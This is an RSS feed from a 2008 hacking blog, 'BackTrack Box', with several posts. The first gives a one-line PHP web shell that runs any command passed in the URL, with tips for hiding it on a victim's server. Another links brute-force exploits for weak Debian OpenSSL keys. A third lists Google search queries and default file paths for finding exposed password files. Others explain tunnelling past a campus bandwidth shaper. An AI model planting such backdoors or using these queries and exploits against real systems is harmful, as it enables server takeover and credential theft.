<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>BackTrack Box</title>
	<atom:link href="http://backtrackbox.com/feed" rel="self" type="application/rss+xml" />
	<link>http://backtrackbox.com</link>
	<description>Mind BackTrack Box Center</description>
	<pubDate>Mon, 09 Jun 2008 15:21:23 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5</generator>
	<language>en</language>
			<item>
		<title>Simple Backdoor script</title>
		<link>http://backtrackbox.com/hacking-tutorial/simple-backdoor-script.box</link>
		<comments>http://backtrackbox.com/hacking-tutorial/simple-backdoor-script.box#comments</comments>
		<pubDate>Mon, 09 Jun 2008 15:21:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Hacking Website]]></category>

		<category><![CDATA[Linux Hacking]]></category>

		<category><![CDATA[hacking tutorial]]></category>

		<guid isPermaLink="false">http://backtrackbox.com/?p=158</guid>
		<description><![CDATA[i&#8217;m sorry not post any articles for a long time. i&#8217;m so fucking busy, so many task to do. here some simple articles. for n00b only. coz it is very simple.
this is very simple backdoor script that i always used.just put at the htdocs or where ever the default root path set by the admin. [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">i&#8217;m sorry not post any articles for a long time. i&#8217;m so fucking busy, so many task to do. here some simple articles. for n00b only. coz it is very simple.</p>
<p style="text-align: justify;">this is very simple backdoor script that i always used.just put at the htdocs or where ever the default root path set by the admin. and dont forget   to give a hidden name. started by dot ( . ) like .help.php or somthing else that not look suspicious. or  you can make a  hidden  directory  also  started by dot ( . ) like .ssh or else, and make sure that you give a different permission from the owner of root path of the default path. usually it will be owned by www-data just set your backdoor script owned by different user like mysql or else. coz somethimes the administrator for the web file do not a super user priveledge so it can keep your backdoor script safe.</p>
<p style="text-align: justify;"><span id="more-158"></span></p>
<p style="text-align: justify;">here is the script, i put as .ssh.php</p>
<blockquote><p>&lt;? system ($_GET[&#8217;cmd&#8217;]) ?&gt;</p></blockquote>
<p>and how to use this one?</p>
<blockquote><p>http://victim.com/.ssh.php?cmd=[Command here]</p></blockquote>
<p>you put do any command there. that all. enjoy!</p>
<p style="text-align: justify;">
<p style="text-align: justify;">
<p style="text-align: justify;">
<div class="aizattos_related_posts"><span class="aizattos_related_posts_header" >Related Posts</span><ul><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/featured/debian-and-ubuntu-openssl-vulnerability.box" rel="bookmark" title="Permanent Link: Debian and Ubuntu OpenSSL vulnerability" >Debian and Ubuntu OpenSSL vulnerability</a></span><div class="aizattos_related_posts_excerpt">this is new and really cools that On May 13th, 2008 the Debian project announced that Luciano Bello ...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/tips-and-tricks/hunting-for-backdoor-scripts.box" rel="bookmark" title="Permanent Link: Hunting for Backdoor scripts" >Hunting for Backdoor scripts</a></span><div class="aizattos_related_posts_excerpt">a great disclosure from burmese hackers community for finding a backdoor scrips at your server. this...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/hacking-tutorial/find-xss-vulnerable-sites.box" rel="bookmark" title="Permanent Link: Find Xss Vulnerable Sites" >Find Xss Vulnerable Sites</a></span><div class="aizattos_related_posts_excerpt">i wont tell like "first look find technique", this some kind trying your luck, i think this is the m...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/hacking-tools/backdoormake-you-easies-to-in-again.box" rel="bookmark" title="Permanent Link: How To : Installing &#8220;Backdoor&#8221; using Radmin Server" >How To : Installing &#8220;Backdoor&#8221; using Radmin Server</a></span></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/hacking-tutorial/howto-using-script-c99txtr57txt-and-fight-back-it.box" rel="bookmark" title="Permanent Link: How To Using c99 Shell and r57 Shell" >How To Using c99 Shell and r57 Shell</a></span></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://backtrackbox.com/hacking-tutorial/simple-backdoor-script.box/feed</wfw:commentRss>
		</item>
		<item>
		<title>againts Openssl Vulnerability</title>
		<link>http://backtrackbox.com/learn/againts-openssl-vulnerability.box</link>
		<comments>http://backtrackbox.com/learn/againts-openssl-vulnerability.box#comments</comments>
		<pubDate>Sat, 24 May 2008 19:52:24 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[OpenSSL vulnerability]]></category>

		<category><![CDATA[Vulnerability]]></category>

		<category><![CDATA[learn]]></category>

		<category><![CDATA[prevent hacking]]></category>

		<category><![CDATA[Preventing Hacker]]></category>

		<guid isPermaLink="false">http://backtrackbox.com/?p=156</guid>
		<description><![CDATA[you must read my recent article about the debian vulnerability here,so you can undestand what actually the vulnerable spot on debian and ubuntu, after knowing about this vulnerability i tried on my box, the scanner report that my box is vulnerable, but when i tried to hack it, using the script i posted on my [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">you must read my recent article about the debian vulnerability <a title="debian vulnerability" href="http://backtrackbox.com/featured/debian-and-ubuntu-openssl-vulnerability.box" target="_blank">here</a>,so you can undestand what actually the vulnerable spot on debian and ubuntu, after knowing about this vulnerability i tried on my box, the scanner report that my box is vulnerable, but when i tried to hack it, using the script i posted on my previous post it can&#8217;t crack anything. when i tried to other box(this is a server and belong to my friends ) i got inside. this make question to me.</p>
<p style="text-align: justify;"><span id="more-156"></span></p>
<p style="text-align: justify;">so why i got different result on a two vulnerable box. here what i got, it&#8217;s okay that this is not truly hole that we can hack and get own our target , it like the other bruteforce hacking technique, just matching to their database that has a  approximation to the matching key. and for not the vulnerable is the <strong>rsa key</strong> , when you make a authorized_keys to your box, that the hole!! if there is not authorized_keys that you set on your box i bet it can&#8217;t be hack using only the technique i post before.</p>
<p style="text-align: justify;">so how to againts this vulnerability? it&#8217;s pretty simple,just remove an authorized_keys setting on you box, and install a preventing package, a forget the package name it like black-list , to make your box key harder to predict. that&#8217;s all, enjoy !</p>
<p style="text-align: justify;">
<div class="aizattos_related_posts"><span class="aizattos_related_posts_header" >Related Posts</span><ul><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/featured/debian-and-ubuntu-openssl-vulnerability.box" rel="bookmark" title="Permanent Link: Debian and Ubuntu OpenSSL vulnerability" >Debian and Ubuntu OpenSSL vulnerability</a></span><div class="aizattos_related_posts_excerpt">this is new and really cools that On May 13th, 2008 the Debian project announced that Luciano Bello ...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/prevent-hacking/review-secure-your-data-using-truecrypt-and-openssl.box" rel="bookmark" title="Permanent Link: Review : Secure your data using TrueCrypt and Open ssL" >Review : Secure your data using TrueCrypt and Open ssL</a></span><div class="aizattos_related_posts_excerpt">do not feel secure enought? may be this can help you to keep your private data. we know everything m...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/hacking-website/lastest-wordpress-vulnerability.box" rel="bookmark" title="Permanent Link: Latest Wordpress Vulnerability" >Latest Wordpress Vulnerability</a></span><div class="aizattos_related_posts_excerpt">highly critical issue i found several day ago that wordpress 2.3.3 has  vulnerability.and it has pos...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/learn/newest-web-hacking-techniques.box" rel="bookmark" title="Permanent Link: Newest Web Hacking Techniques" >Newest Web Hacking Techniques</a></span></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/vulnerability/hacking-adobe-photoshop-cs2-cs3-file-buffer-overflow.box" rel="bookmark" title="Permanent Link: Adobe Photoshop CS2 / CS3 File Buffer Overflow" >Adobe Photoshop CS2 / CS3 File Buffer Overflow</a></span></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://backtrackbox.com/learn/againts-openssl-vulnerability.box/feed</wfw:commentRss>
		</item>
		<item>
		<title>Debian and Ubuntu OpenSSL vulnerability</title>
		<link>http://backtrackbox.com/featured/debian-and-ubuntu-openssl-vulnerability.box</link>
		<comments>http://backtrackbox.com/featured/debian-and-ubuntu-openssl-vulnerability.box#comments</comments>
		<pubDate>Mon, 19 May 2008 23:31:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[LAN Hacking]]></category>

		<category><![CDATA[Linux Hacking]]></category>

		<category><![CDATA[Linux Think]]></category>

		<category><![CDATA[OpenSSL vulnerability]]></category>

		<category><![CDATA[Rookit]]></category>

		<category><![CDATA[Vulnerability]]></category>

		<category><![CDATA[featured]]></category>

		<category><![CDATA[hacking tools]]></category>

		<category><![CDATA[debian OpenSSL vulnerability]]></category>

		<category><![CDATA[hacking linux]]></category>

		<category><![CDATA[hacking linux box how to]]></category>

		<category><![CDATA[ubuntu OpenSSL vulnerability]]></category>

		<category><![CDATA[vulnerable server]]></category>

		<guid isPermaLink="false">http://backtrackbox.com/?p=153</guid>
		<description><![CDATA[this is new and really cools that On May 13th, 2008 the Debian project announced that Luciano Bello found an interesting vulnerability in the OpenSSL package they were distributing. The bug in question was caused by the removal of the following line of code from md_rand.c.
so what is it? if you have read my articles [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">this is new and really cools that On May 13th, 2008 the Debian project announced that Luciano Bello found an interesting vulnerability in the OpenSSL package they were distributing. The bug in question was caused by the removal of the following line of code from <em>md_rand.c</em>.</p>
<p style="text-align: justify;">so what is it? if you have read my articles about <a title="http://backtrackbox.com/featured/how-to-create-one-way-linux-backdoor-using-pair-key.box" href="http://backtrackbox.com/featured/how-to-create-one-way-linux-backdoor-using-pair-key.box" target="_blank">how to using pairkey as a backdoor or rookit</a>. this vulnerable is also playing using SSL and SSH keys generated on Debian-based systems (Ubuntu, Kubuntu, etc). Luciano bello found that he said between September 2006 and May 13th, 2008 in case of SSL keys,<strong> Any Certificate Authority keys generated on a Debian-based system is vulnerable!!</strong> . All system administrators that allow users to access their servers with SSH and public key authentication need to audit those keys to see if any of them were created on a vulnerabile system. Any tools that relied on OpenSSL&#8217;s PRNG to secure the data they transferred may be vulnerable to an offline attack.</p>
<p style="text-align: justify;">
<p style="text-align: justify;"><span id="more-153"></span></p>
<p style="text-align: justify;">the simple explanation will be like this when creating a new OpenSSH key, or when you type &#8220;ssh-keygen&#8221; there are only 32,767 possible outcomes for a given architecture, key size, and key type. The reason is that the only &#8220;random&#8221; data being used by the PRNG is the ID of the process.and what if we have all list of possibility outcomes? here we go.. <img src='http://backtrackbox.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> this man have all of it , and of course the script for bruteforcing it too. <img src='http://backtrackbox.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> and in addition the script to do the remote scan <img src='http://backtrackbox.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p style="text-align: justify;">all you can download here :</p>
<p style="text-align: justify;">http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2</p>
<p style="text-align: justify;">http://demo21.ovh.com/82a960d7199ea9391c73c2034b6b34dfP/debian_ssh_scan_v4.tar.bz2</p>
<p style="text-align: justify;">http://milw0rm.com/exploits/5632</p>
<p style="text-align: justify;">ps :</p>
<p style="text-align: justify;">i&#8217;ve try this exploits, i don&#8217;t get it all coz i just tried it last night, not all that VULNERABLE server you scanned can you brute for, even if the scanner said it VULNERABLE. this is what i don&#8217;t get it. but i got one vulnerable :P, maybe i&#8217;ll post the step by step how to using this script , maybe next post , that all. thanks <img src='http://backtrackbox.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<div class="aizattos_related_posts"><span class="aizattos_related_posts_header" >Related Posts</span><ul><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/learn/againts-openssl-vulnerability.box" rel="bookmark" title="Permanent Link: againts Openssl Vulnerability" >againts Openssl Vulnerability</a></span><div class="aizattos_related_posts_excerpt">you must read my recent article about the debian vulnerability here,so you can undestand what actual...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/hacking-tutorial/howto-hack-mobile-device-over-bluetooth.box" rel="bookmark" title="Permanent Link: HowTo : Hack Mobile Device Over Bluetooth" >HowTo : Hack Mobile Device Over Bluetooth</a></span><div class="aizattos_related_posts_excerpt">
i'm sorry maybe for a while i won't write an articles but i will still post. i still working with ...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/prevent-hacking/review-secure-your-data-using-truecrypt-and-openssl.box" rel="bookmark" title="Permanent Link: Review : Secure your data using TrueCrypt and Open ssL" >Review : Secure your data using TrueCrypt and Open ssL</a></span><div class="aizattos_related_posts_excerpt">do not feel secure enought? may be this can help you to keep your private data. we know everything m...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/hacking-website/lastest-wordpress-vulnerability.box" rel="bookmark" title="Permanent Link: Latest Wordpress Vulnerability" >Latest Wordpress Vulnerability</a></span></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/learn/newest-web-hacking-techniques.box" rel="bookmark" title="Permanent Link: Newest Web Hacking Techniques" >Newest Web Hacking Techniques</a></span></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://backtrackbox.com/featured/debian-and-ubuntu-openssl-vulnerability.box/feed</wfw:commentRss>
		</item>
		<item>
		<title>Bypass Campus Bandwidth Shaper #2</title>
		<link>http://backtrackbox.com/learn/bypass-campus-bandwidth-shaper-2.box</link>
		<comments>http://backtrackbox.com/learn/bypass-campus-bandwidth-shaper-2.box#comments</comments>
		<pubDate>Fri, 16 May 2008 13:47:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Sock5 Tunneling]]></category>

		<category><![CDATA[learn]]></category>

		<category><![CDATA[proxy server]]></category>

		<category><![CDATA[tips and tricks]]></category>

		<category><![CDATA[tutorial]]></category>

		<category><![CDATA[proxy]]></category>

		<category><![CDATA[socks proxy]]></category>

		<guid isPermaLink="false">http://backtrackbox.com/?p=151</guid>
		<description><![CDATA[after finding a server using technique on my previous article , assuming that you already have a remote server that you will make as your socks server. now we will try to make it as our socks server with this following step , there will be two different step, one using putty for windows and [...]]]></description>
			<content:encoded><![CDATA[<p>after finding a server using technique on my previous <a title="http://backtrackbox.com/featured/bypass-campus-bandwidth-shaper.box" href="http://backtrackbox.com/featured/bypass-campus-bandwidth-shaper.box" target="_blank">article</a> , assuming that you already have a remote server that you will make as your socks server. now we will try to make it as our socks server with this following step , there will be two different step, one using putty for windows and using ssh for linux of course , here the step :</p>
<p><span id="more-151"></span></p>
<p>for windows :</p>
<ul>
<li>open your putty(get the latest version)</li>
<li>set on SSH section on Tunnel tab, add a port that will use you use on you computer. and set it as a dynamic one.</li>
<li>at the main SSH section set the putty to Don&#8217;t start a shell command at all</li>
<li>set at the Proxy section. chose the http one, and put you campus or office proxy server there, if it need a authentication put below it.</li>
<li>and the last is go to the Session section, set it to your Socks server and put the port.</li>
<li>you done,you have a new socks server new! <img src='http://backtrackbox.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </li>
</ul>
<p>for linux here some ssh command that you need</p>
<ul>
<li>ssh [user@socksserver] -p [ServerPort] -fND OurPort -o &#8220;ProxyCommand connect-proxy -H CampusProxyServer:CampusProxyPort %h %p&#8221;</li>
</ul>
<p>just in case that you need a authentication , you can use this command first :</p>
<ul>
<li>export HTTP_PROXY_USER=user@server</li>
<li>export HTTP_PROXY_PASSWORD=passowrd</li>
<li>and done</li>
</ul>
<p>enjoy! <img src='http://backtrackbox.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /></p>
<div class="aizattos_related_posts"><span class="aizattos_related_posts_header" >Related Posts</span><ul><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/featured/bypass-campus-bandwidth-shaper.box" rel="bookmark" title="Permanent Link: bypass campus bandwidth shaper" >bypass campus bandwidth shaper</a></span><div class="aizattos_related_posts_excerpt">another post about increasing our bandwidth :P . you can read the previous here, here and here. or y...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/featured/how-to-make-a-hacked-proxy-server-using-bouncer.box" rel="bookmark" title="Permanent Link: How To Make a Hacked Proxy Server Using Bouncer" >How To Make a Hacked Proxy Server Using Bouncer</a></span><div class="aizattos_related_posts_excerpt">actually i not really want to write this one, but since i want to write how to boost our campus band...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/featured/how-to-boost-your-campus-internet-bandwidth.box" rel="bookmark" title="Permanent Link: How To Boost your Campus Internet Bandwidth" >How To Boost your Campus Internet Bandwidth</a></span><div class="aizattos_related_posts_excerpt">just want to share one of my technique how to manipulate my campus bandwidth,i just use this techniq...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/tips-and-tricks/speed-internet-connection.box" rel="bookmark" title="Permanent Link: Tips and Tricks : How To Speed Up Internet Connection" >Tips and Tricks : How To Speed Up Internet Connection</a></span></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/featured/make-socks5-server-how-to.box" rel="bookmark" title="Permanent Link: Make Socks5 Server How To" >Make Socks5 Server How To</a></span></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://backtrackbox.com/learn/bypass-campus-bandwidth-shaper-2.box/feed</wfw:commentRss>
		</item>
		<item>
		<title>Password Stealing using Google dork</title>
		<link>http://backtrackbox.com/google-hack/password-stealing-using-google-dork.box</link>
		<comments>http://backtrackbox.com/google-hack/password-stealing-using-google-dork.box#comments</comments>
		<pubDate>Wed, 14 May 2008 10:08:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Google Hack]]></category>

		<category><![CDATA[password stealing]]></category>

		<category><![CDATA[google dork]]></category>

		<guid isPermaLink="false">http://backtrackbox.com/?p=148</guid>
		<description><![CDATA[In theory, everyone knows that passwords should not reside on post-its stuck to the monitor or under the keyboard. In practice, however, surprisingly many people store passwords in text files and put them in their home directories, which(funnily enough) are acces-sible through the Internet. What&#8217;s more, many such individuals work as network administrators or similar, [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">In theory, everyone knows that passwords should not reside on post-its stuck to the monitor or under the keyboard. In practice, however, surprisingly many people store passwords in text files and put them in their home directories, which(funnily enough) are acces-sible through the Internet. What&#8217;s more, many such individuals work as network administrators or similar, so the files can get pretty big.It&#8217;s hard to define a single method of locating such data, but googling for such keywords as account, users, admin, administrators, passwd,password and so on can be pretty effective, especially coupled with such filetypes as .xls, .txt, .doc,.mdb and .pdf</p>
<p style="text-align: justify;"><span id="more-148"></span><br />
. It&#8217;s also worth nothing directories whose names containthe words admin,backup and so forth – a query like inurl:admin  intitle:index.of will do the trick.here are some Google queries for locating passwords :</p>
<p><strong>&#8220;http://*:*@www&#8221; site</strong> : passwords for site, stored as the string &#8220;http://username:password@www&#8230;&#8221;<br />
<strong>filetype:bak inurl:&#8221;htaccess|passwd|shadow|ht users&#8221;</strong> :file backups, potentially containing user names and passwords<br />
<strong>filetype:mdb inurl:&#8221;account|users|admin|administrators|passwd|password&#8221;</strong> : mdb files, potentially containing password information<br />
<strong>intitle:&#8221;Index of&#8221; pwd.db  : pwd.db</strong> :files, potentially containing user names and encrypted passwords<br />
<strong>inurl:admin inurl:backup intitle:index.of </strong>: directories whose names contain the words admin and backup<br />
<strong>&#8220;Index of/&#8221; &#8220;Parent Directory&#8221; &#8220;WS _ FTP.ini&#8221; filetype:ini WS _ FTP PWD</strong> : WS_FTP configuration files, potentially containing FTP server access passwords</p>
<p><strong>ext:pwd inurl:(service|authors|administrators|users) &#8220;# -FrontPage-&#8221;</strong> : files containing Microsoft FrontPage passwords<br />
<strong>filetype:sql (&#8221;passwd values ****&#8221; |  &#8220;password values ****&#8221; | &#8220;pass values ****&#8221; )</strong> : files containing SQL code and passwords inserted into a database</p>
<p><strong>intitle:index.of trillian.ini </strong> :           configuration files for the Trillian IM<br />
<strong>eggdrop filetype:user user </strong> :                configuration files for the Eggdrop ircbot<br />
<strong>filetype:conf slapd.conf </strong> :              configuration files for OpenLDAP<br />
<strong>inurl:&#8221;wvdial.conf&#8221; intext:&#8221;password&#8221; </strong> :    configuration files for WV Dial<br />
<strong>ext:ini eudora.ini </strong> :          configuration files for the Eudora mail client<br />
<strong>filetype:mdb inurl:users.mdb   : </strong> Microsoft Access files, potentially containing user account information<br />
<strong>intext:&#8221;powered by Web Wiz Journal&#8221; </strong> :  websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file – just enter http://&lt;host&gt;/journal/journal.mdb instead of the default http://&lt;host&gt;/  journal/</p>
<p><strong>&#8220;Powered by DUclassified&#8221; -site:duware.com </strong> :  websites using the DUclassified, DUcalendar, DUdirectory, DU-<br />
<strong>&#8220;Powered by DUcalendar&#8221; -site:duware.com</strong> :   classmate, DUdownload, DUpaypal, DUforum or DUpics applica-<br />
<strong>&#8220;Powered by DUdirectory&#8221; -site:duware.com</strong> :   tions, which by default make it possible to obtain the passwords<br />
<strong>&#8220;Powered by DUclassmate&#8221; -site:duware.com </strong>:    file – for DUclassified, just enter http://&lt;host&gt;/duClassified/ _<br />
<strong>&#8220;Powered by DUdownload&#8221; -site:duware.com </strong> :   private/duclassified.mdb instead of http://&lt;host&gt;/duClassified/<br />
<strong>&#8220;Powered by DUpaypal&#8221; -site:duware.com</strong> :<br />
<strong>&#8220;Powered by DUforum&#8221; -site:duware.com</strong> :<br />
<strong>intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com :<br />
</strong><br />
<strong>intext:&#8221;BiTBOARD v2.0&#8243; &#8220;BiTSHiFTERS Bulletin Board&#8221; </strong> : websites using the Bitboard2 bulletin board application, which on default settings allows the passwords file to be obtained – enter http://&lt;host&gt;/forum/admin/data _ passwd.dat instead of the default http://&lt;host&gt;/forum/forum.php</p>
<div class="aizattos_related_posts"><span class="aizattos_related_posts_header" >Related Posts</span><ul><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/google-hack/find-your-ultimate-cgi-proxy-using-google-dork.box" rel="bookmark" title="Permanent Link: Find your Ultimate CGI Proxy using Google Dork" >Find your Ultimate CGI Proxy using Google Dork</a></span><div class="aizattos_related_posts_excerpt">
if your college block your favorite site such myspace or other social network website, your colleg...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/hacking-tutorial/rooting-phpmyadmin-with-google-dork-and-spawn-a-shell-repost.box" rel="bookmark" title="Permanent Link: Rooting PHPMyadmin with Google Dork and Spawn a Shell [Repost]" >Rooting PHPMyadmin with Google Dork and Spawn a Shell [Repost]</a></span><div class="aizattos_related_posts_excerpt">i saw a video that teach how to spawn a shell via phpMyadmin,but there is some problem how can i fin...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/hacking-tutorial/how-to-getting-and-cracking-password-in-windows-xp2vista-or-linux-box-using-pwdump-and-john-the-ripper.box" rel="bookmark" title="Permanent Link: How To Getting and Cracking Password in Windows XP2,Vista or Linux Box using PwDump and John The Ripper" >How To Getting and Cracking Password in Windows XP2,Vista or Linux Box using PwDump and John The Ripper</a></span><div class="aizattos_related_posts_excerpt">
may be this is hack think i first learn, cracking password using pwDump and john the ripper. actua...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/learn/newest-web-hacking-techniques.box" rel="bookmark" title="Permanent Link: Newest Web Hacking Techniques" >Newest Web Hacking Techniques</a></span></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/scripts/google-hack-googledork-searching-secrets.box" rel="bookmark" title="Permanent Link: Google Hack using &#8220;GoogleDork&#8221; - Searching for Secrets" >Google Hack using &#8220;GoogleDork&#8221; - Searching for Secrets</a></span></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://backtrackbox.com/google-hack/password-stealing-using-google-dork.box/feed</wfw:commentRss>
		</item>
		<item>
		<title>bypass campus bandwidth shaper</title>
		<link>http://backtrackbox.com/featured/bypass-campus-bandwidth-shaper.box</link>
		<comments>http://backtrackbox.com/featured/bypass-campus-bandwidth-shaper.box#comments</comments>
		<pubDate>Mon, 12 May 2008 13:02:26 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Free Thinks]]></category>

		<category><![CDATA[Hacked Proxy]]></category>

		<category><![CDATA[featured]]></category>

		<category><![CDATA[tips and tricks]]></category>

		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://backtrackbox.com/?p=146</guid>
		<description><![CDATA[another post about increasing our bandwidth  . you can read the previous here, here and here. or you can read another post by search at this site. speaking of witch , i thing i should make a paper about this one  coz i&#8217;ve post a lot post about this thing, it not need [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">another post about increasing our bandwidth <img src='http://backtrackbox.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> . you can read the previous <a title="bypass campus bandwidth shaper" href="http://backtrackbox.com/featured/how-to-boost-your-campus-internet-bandwidth.box" target="_blank">here</a>, <a title="bypass campus bandwidth shaper" href="http://backtrackbox.com/featured/how-to-make-a-hacked-proxy-server-using-bouncer.box" target="_blank">here</a> and <a title="bypass campus bandwidth shaper" href="http://backtrackbox.com/tips-and-tricks/speed-internet-connection.box" target="_blank">here</a>. or you can read another post by search at this site. speaking of witch , i thing i should make a paper about this one <img src='http://backtrackbox.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> coz i&#8217;ve post a lot post about this thing, it not need to do hacking first it just do some tricks to bypass the campus firewall using the opened port. for doing this trick what you need is a proxy server that has an opened port to we access, and for note this is only for a subnet that has a bandwidth shaper such us at campus or your office.if you have a direct connection ,i thing this will be useless, i&#8217;ll post at two different post to make you easily understand how to do this tricks and of course hope you understand the concept.</p>
<p style="text-align: justify;"><span id="more-146"></span></p>
<p style="text-align: justify;">this first post is the preparing and finding the server first.to make it simple here is the step :</p>
<ul>
<li>find a server, outside your campus of course. there will be some thing complicated here. you must find a server that allow a same port that allowed on you campus firewall setting. some times it allowed and some not. ok. it is complicated i thing, this is some example :
<ul>
<li>i have a server A outside my campus, that open a ssh service on port 666. so i have to connect to to this server via my campus connection , and we&#8217;ll use a socks technique to make server A become our new socks server</li>
</ul>
</li>
<li>you can try a shared socks server or http one, you can search at google it pretty much there. now we&#8217;ll try to make a connection to our server. there are two ways to test this step first using telnet and the last using connect-proxy method.
<ul>
<li>connect proxy is a binary that we must install first. we will need this when we make the connection to our server.</li>
<li>connect-proxy will be like this : export your http_proxy,http_password and try to connect to server</li>
</ul>
</li>
</ul>
<blockquote><p>export HTTP_PROXY_USER=me@server<br />
export HTTP_PROXY_PASSWORD=password<br />
connect-proxy -H campus-proxy-server:port SERVER-A portA</p>
<p>what happen here is we try to connect to server-A:portA using our campus-proxy-server:port , campus-proxy is our campus proxy server.you&#8217;ll notice whne you allowed to connect. if it not i thing it give you 304 access denied</p></blockquote>
<ul>
<blockquote>
<li>i want to give another step using telnet but i dont now how to give a username and password authentication using telnet so i thing you can try the first step one.</li>
</blockquote>
</ul>
<p>i thing this is enough for the opening, try to find a server first because without it it will be useless of course. <img src='http://backtrackbox.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /></p>
<div class="aizattos_related_posts"><span class="aizattos_related_posts_header" >Related Posts</span><ul><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/learn/bypass-campus-bandwidth-shaper-2.box" rel="bookmark" title="Permanent Link: Bypass Campus Bandwidth Shaper #2" >Bypass Campus Bandwidth Shaper #2</a></span><div class="aizattos_related_posts_excerpt">after finding a server using technique on my previous article , assuming that you already have a rem...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/featured/how-to-make-a-hacked-proxy-server-using-bouncer.box" rel="bookmark" title="Permanent Link: How To Make a Hacked Proxy Server Using Bouncer" >How To Make a Hacked Proxy Server Using Bouncer</a></span><div class="aizattos_related_posts_excerpt">actually i not really want to write this one, but since i want to write how to boost our campus band...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/featured/how-to-boost-your-campus-internet-bandwidth.box" rel="bookmark" title="Permanent Link: How To Boost your Campus Internet Bandwidth" >How To Boost your Campus Internet Bandwidth</a></span><div class="aizattos_related_posts_excerpt">just want to share one of my technique how to manipulate my campus bandwidth,i just use this techniq...</div></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/tips-and-tricks/speed-internet-connection.box" rel="bookmark" title="Permanent Link: Tips and Tricks : How To Speed Up Internet Connection" >Tips and Tricks : How To Speed Up Internet Connection</a></span></li><li><span class="aizattos_related_posts_title"><a href="http://backtrackbox.com/featured/make-socks5-server-how-to.box" rel="bookmark" title="Permanent Link: Make Socks5 Server How To" >Make Socks5 Server How To</a></span></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://backtrackbox.com/featured/bypass-campus-bandwidth-shaper.box/feed</wfw:commentRss>
		</item>
		<item>
		<title>DHCP name poisoning attacks</title>
		<link>http://backtrackbox.com/scripts/dhcp-name-poisoning-attacks.box</link>
		<comments>http://backtrackbox.com/scripts/dhcp-name-poisoning-attacks.box#comments</comments>
		<pubDate>Sat, 10 May 2008 13:44:37 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[DHCP Hack]]></category>

		<category><![CDATA[Exploits]]></category>

		<category><![CDATA[Linux Hacking]]></category>

		<category><![CDATA[Linux Think]]></category>

		<category><![CDATA[scripts]]></category>

		<category><![CDATA[dhcp hacking]]></category>

		<category><![CDATA[dhcp poisoning]]></category>

		<guid isPermaLink="false">http://backtrackbox.com/?p=144</guid>
